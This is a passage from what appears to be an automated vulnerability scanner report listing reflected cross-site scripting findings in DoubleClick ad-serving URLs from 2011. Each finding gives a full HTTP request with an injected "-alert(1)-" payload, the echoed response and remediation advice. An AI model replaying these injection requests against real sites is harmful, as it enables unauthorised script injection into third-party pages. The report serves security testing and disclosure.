3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488519f1"-alert(1)-"cc5a0c33515&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99772"-alert(1)-"2b722a970f9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=11251499772"-alert(1)-"2b722a970f9&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:28 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=11251499772"-alert(1)-"2b722a970f9&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88227"-alert(1)-"fcf0b6f9d7d was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c30653088227"-alert(1)-"fcf0b6f9d7d&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:26:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c30653088227"-alert(1)-"fcf0b6f9d7d&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613e3"-alert(1)-"21fa9330d9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&613e3"-alert(1)-"21fa9330d9a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6054
Date: Tue, 28 Jun 2011 02:27:04 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&613e3"-alert(1)-"21fa9330d9a=1http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb04"-alert(1)-"12c860f5038 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=acb04"-alert(1)-"12c860f5038 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:26:41 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
91%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=acb04"-alert(1)-"12c860f5038http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

1.27. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8931a"-alert(1)-"96fd3dbaeee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=4675506593120912348931a"-alert(1)-"96fd3dbaeee&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=4675506593120912348931a"-alert(1)-"96fd3dbaeee&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.28. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c69f3"-alert(1)-"17b445dd750 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488c69f3"-alert(1)-"17b445dd750&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488c69f3"-alert(1)-"17b445dd750&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.29. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f09"-alert(1)-"61479ab10b3 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509a5f09"-alert(1)-"61479ab10b3&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:25 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509a5f09"-alert(1)-"61479ab10b3&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.30. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575a0"-alert(1)-"2dc14e7726b was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530575a0"-alert(1)-"2dc14e7726b&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:24:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530575a0"-alert(1)-"2dc14e7726b&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var o
...[SNIP]...

1.31. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96da"-alert(1)-"f7095fb1d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&d96da"-alert(1)-"f7095fb1d0a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
